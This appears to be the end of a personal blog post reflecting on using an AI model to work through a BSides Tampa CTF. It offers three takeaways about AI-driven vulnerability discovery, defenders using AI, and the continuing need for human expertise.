One pragmatic warning if you want to try this seriously: too many classifier hits, even on legitimate work, can rack up policy-violation flags on your account. Didn't happen to me this weekend. Worth knowing.

Main hall at BSides Tampa. We worked the CTF during the talks and in between them. Laptop open the whole time.

Three takeaways

One. The cybersecurity industry is still processing Mythos. The truth is more dramatic. Any modern frontier model paired with a good harness can find and exploit a wide range of real vulnerabilities. Closing AI models, or restricting them from the public, doesn't help — that ship sailed eighteen months ago when XBOW hit #1 on HackerOne with a fully autonomous pipeline.

Two. We are probably not doomed. Every vulnerability in the CTF was the result of a coding mistake. The same AI tools that find them on the offensive side can find them on the defensive side. Run your code against AI. Find your mistakes before someone else does.

Three. We still need human experts. Yes — this CTF could have been completed by a user with zero cybersecurity knowledge plus the right AI. The real world is messier. AI doesn't find everything. It hallucinates problems that don't exist and misses ones that do. It struggles with systematic coverage at scale. You still need people who know the domain, who can navigate and control the AI, who can tell a real finding from a confabulation. The CTF was genuinely hard — to solve it without AI, you would need to be deeply experienced across half a dozen specializations. That kind of expertise is harder to acquire now, not easier. But that is what studying is for.

And one closing note for the people who still want to argue that what I described above isn't reasoning, just very sophisticated retrieval.

I can't disprove that position. Neither can you prove it. The internal mechanism is genuinely unsettled science. But there is a pragmatic test: if a system reliably produces the same outputs that reasoning would produce, on novel problems it has never seen, in domains that compose in unfamiliar ways, the distinction between "reasoning" and "indistinguishable from reasoning" stops mattering operationally. We pay engineers to ship working exploits, not to defend their epistemology.

The interesting question isn't whether AI can do this. It's whether your defenders are using AI as fluently as the attackers will be next year.

BSides trophy. A plush seal — coincidence with the AI's name was not lost on me.